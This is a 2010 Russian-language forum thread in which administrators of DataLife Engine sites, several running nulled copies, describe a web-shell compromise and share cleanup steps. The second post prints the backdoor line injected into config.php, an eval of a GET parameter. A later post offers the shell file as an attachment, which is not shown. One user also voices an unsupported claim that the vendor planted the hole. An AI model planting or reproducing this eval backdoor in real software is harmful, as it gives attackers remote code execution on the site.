Инфо Массовый взлом сайтов на DLE

Тема в разделе "DLE", создана пользователем Christmasnet, 21 сен 2010.

Информация :
Актуальная версия DataLife Engine 11.3
( Final Release v.11.3 | Скачать DataLife Engine | Скачать 11.3 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 11.2 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. Christmasnet

    Christmasnet

    Регистр.:
    20 окт 2008
    Сообщения:
    151
    Симпатии:
    54
    DLE 8.5 Nulled-Mid-team

    Есть такая группа или хацкер Web Shell by oRb.
    Недавно обнаружил у себя на сайте шелл, залитый в папку uploads/fotos. Решил обновиться до DLE 9.0, после установки проверил антивирусом и нашел эту гадость.

    Вот что может этот шелл.
    на сайте появляется админ с логином Перейти по ссылке

    Смотрите свои сайты, обновляйте.
     
    The Finn, Reznik, Sergio и ещё 1-му нравится это.
  2. absolutNICK

    absolutNICK Постоялец

    Регистр.:
    31 авг 2007
    Сообщения:
    142
    Симпатии:
    21
    У меня такая же самая беда.
    Вот что ещё надо проверить:
    файл dbconfig.php и config.php в папке /engine/data/
    В файл dbconfig.php прописывается жаваскрипт с партнёркой. А в файл config.php дописывается код:
    Код:
    'lang_123' => "{${@eval($_GET[cmd])}}",
    Скорей всего что используется недавно обнаруженная уязвимость на недостаточную обработку данных. Об этом можно прочитать и на офф. сайте DLE и здесь у нас на форуме тоже Перейти по ссылке.
    Очень удобно, имея на руках базу DLEшных сайтов для постинга новостей, пройтись по ней с целью использования уязвимости. Есть кстати версия, что это разработчики DLE решили использовать уязвимость для поднятия уровня продаж своего софта.
     
    View нравится это.
  3. index111

    index111

    Регистр.:
    21 окт 2007
    Сообщения:
    533
    Симпатии:
    77
    утром обнаружил на одном варезнике второго админа и ник такой же, вот засранцы :-] спасибо что про шелл написали, а то бы не заметил...
    Год наверна не заходил на сайт, как сат. держу, и тут такое, обновился сразу. Не понял только зачем им, вроде ничего не тронули.
     
  4. absolutNICK

    absolutNICK Постоялец

    Регистр.:
    31 авг 2007
    Сообщения:
    142
    Симпатии:
    21
    А ты смотрел файл dbconfig.php - там может быть жава с партнёркой плятящей за просмотры.
     
    The Finn и index111 нравится это.
  5. index111

    index111

    Регистр.:
    21 окт 2007
    Сообщения:
    533
    Симпатии:
    77
    Спасибо за инфу выше, проверял пусто :nezn:
     
  6. Christmasnet

    Christmasnet

    Регистр.:
    20 окт 2008
    Сообщения:
    151
    Симпатии:
    54
    У меня после этого шелла начались проблемы с базой, делаю оптимизацию и все база не пашет, помечается три таблицы как сбойные. куда копать не вкурю...
     
  7. absolutNICK

    absolutNICK Постоялец

    Регистр.:
    31 авг 2007
    Сообщения:
    142
    Симпатии:
    21
    Кстати, если хотите быстро проверить взломан ли ваш дле-шный сайт, проверьте rss. Если rss выдаёт ошибку - то 95% что у вас стоит тот самый шел.
     
  8. Gadukin

    Gadukin Создатель

    Регистр.:
    12 ноя 2008
    Сообщения:
    32
    Симпатии:
    0
    у меня не хочет востанавливаться из резервной копии
     
  9. BKK

    BKK

    Регистр.:
    21 окт 2009
    Сообщения:
    161
    Симпатии:
    45
    как бы название топика не соответствует тексту в посте
    причем тут массовый взлом сайтов, и шелл на конкретном сайте?
     
  10. antiterror

    antiterror xProgramming

    Регистр.:
    22 авг 2007
    Сообщения:
    344
    Симпатии:
    135
    Вот нашёл тоже у себя shell этот, токо не смогли они взломать мой сайт, зашита стоит)! если кому нужен смотрим аттачмент))
    Посмотреть вложение foto_5555.txt

    Для тех у кого был shell залит!
    Удалите все файлы и исключительно все файлы если же оставляете проверьте всё на наличии каких либо shell файлов!
    Смените все пароли админов или редакторов или модеров! Создайте backup базы, а так же создайте новую базу с новым паролем! После чего залейте все файлы заново на сервер и загрузите backup базы в новую базу! Только это поможет!
     
    Hmelex нравится это.
Статус темы:
Закрыта.